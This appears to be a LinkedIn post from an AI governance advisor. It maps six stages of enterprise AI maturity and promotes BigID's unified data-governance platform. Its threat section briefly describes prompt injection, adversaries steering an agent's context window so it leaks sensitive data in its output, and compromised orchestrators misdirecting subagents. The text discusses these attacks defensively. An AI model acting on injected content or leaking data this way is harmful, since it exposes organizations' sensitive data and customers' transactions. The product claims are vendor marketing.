Most organizations are not at a single stage of AI maturity. They operate across three or four stages simultaneously, each with radically different levels of governance. That is the stage problem—and it is why the control layer has to be built before the ecosystem grows any larger.
I recently recorded an episode of Ctrl+Alt+AI with Dimitri Sirota, CEO of BigID, in which we mapped the six stages of AI evolution, from early machine learning to autonomous multi-agent systems. The conversation highlighted something I want on the record: the governance gap in enterprise AI is not primarily a technology problem. It is a matter of stage awareness.
The six stages, briefly: Stage 1 was ML as a signal generator — 2010 to 2017. AI surfaced a recommendation; a human made every consequential decision. Stage 2 gave us language models that could understand and generate language, still fundamentally assistive. Stage 3 was the Copilot moment—an interactive collaborator in your IDE, browser, and inbox. Stage 4 is where everything changed: agents gained tools and memory. They could browse the web, write to a database, call an API, and remember context across sessions. Stage 5 is standardized system interconnection—agents reach across enterprise systems, data sources, and tools through standardized interfaces rather than custom integrations rebuilt for every endpoint. MCP is the clearest current example of this emerging standard, but the stage is defined by the capability, not the protocol: seamless, governed, multi-system reach that lets an agent operate across an organization’s full technology stack without a custom integration for each surface. Stage 6 is the destination: autonomous, multi-agent, running full workflows without human handoffs.
Most organizations are simultaneously somewhere between Stages 3 and 5, and governance models have not kept up with any of it. I have seen this firsthand at many companies. The access model was built around human employee lifecycle events—onboarding, offboarding, and role changes. It had no concept of a non-human identity provisioned by a developer on a Tuesday afternoon, querying 200 tables in a single automated run, and never appearing in any HR system. The access review cycle was quarterly. The agent was in production by the afternoon.
The failure mode I see most often across my advisory portfolio — at e-commerce and travel companies, fintechs, and cloud infrastructure companies — is treating AI governance as separate from data governance. Teams deploy a point solution for AI risk that does not share a data model with their Data Security Posture Management (DSPM) or access governance platform. You end up with three systems, each with a partial view, none of which can answer what actually matters: what sensitive data this agent accessed, whether that access was appropriate given the full context of what the data is—its sensitivity classification, who owns it, what systems it flows through, and what regulatory exposure it carries; and whether anything anomalous is happening right now?
That is the integration gap BigID’s architecture closes. DSPM, Data Access Governance (DAG), and data activity monitoring (DAM) are unified under a single data model. Access governance without a data intelligence layer is always one step removed from the actual risk. Determining whether an agent’s access is legitimate — not just permissioned, but genuinely appropriate — requires the broadest possible context: what the data is, how sensitive it is, who is accountable for it, how it relates to other data assets, and what the agent was supposed to be doing in the first place. That context is exactly what BigID’s unified data intelligence layer holds, and it is what makes the difference between a governance platform that detects anomalies and one that can actually judge them. The agent problem makes that gap catastrophic at speeds and scales humans never achieved.
The threat landscape of agentic AI is also more novel than most security teams have internalized. Prompt injection — ranked the top vulnerability on OWASP’s 2025 LLM Top 10 — is not a prompt-quality problem. It is a trust-boundary problem. When an agent has access to your customer database, internal documents, and email system, every piece of content it processes becomes a potential attack surface. The agent cannot verify that the content is not adversarial. At fintech and payment companies, where I advise on technology strategy, agents operating in financial infrastructure mean that the consequences of a successful injection are not just a bad output—they are a transaction.
The context window as an exfiltration vector is a related problem that is even less understood. An adversary who can influence what goes into an agent’s context window can cause the agent to encode sensitive data into an output that is transmitted to a location where it should not go. Most organizations have no visibility into what is in the context window at any given moment. That is an open attack surface with no detective control in front of it.
And then there is the multi-agent trust problem, which will define Stage 6 security. In a multi-agent system, an orchestrator agent spawns and directs subagents. The subagent receives instructions from the orchestrator — but there is no formal mechanism for the subagent to verify that the orchestrator is legitimate and has not been compromised. Attackers exploit implicit trust between system components. We think about cloud services authenticating to each other at every boundary. The same principle must apply to agent-to-agent communication, yet the tooling is essentially nonexistent today.
The last point I’ll leave you with is the one I emphasized most in the podcast conversation: governance that creates friction does not get adopted—it gets worked around. I’ve worked at many companies rapidly scaling to 100s of millions of customers. Governance that slowed deployment was not an option. The answer was governance that moved as fast as the business—automated, data-driven, and embedded in the development workflow rather than bolted on as an audit layer afterward.
Architecturally, BigID’s AskBigID capability and Prompt-Based Classification enable governance at machine speed. If your governance platform is slower than your deployment cadence, it loses. Organizations that operationalize governance as an automated control layer—rather than a manual review process—can safely scale to Stages 5 (standardized system interconnection) and 6 (autonomous multi-agent workflows). Those who treat governance as a compliance exercise will be rebuilding after an incident they could have prevented.
Start now. The permissions you grant an agent today, the credentials that never get rotated, and the multi-agent pipelines running without trust verification — those are the incidents you will be investigating 18 months from now. I have seen what cleanup looks like at scale across companies with complex data estates spanning multiple jurisdictions. The cost of getting ahead of it is an order of magnitude lower than the cost of responding after something goes wrong.
As originally published in The Retrospective on LinkedIn.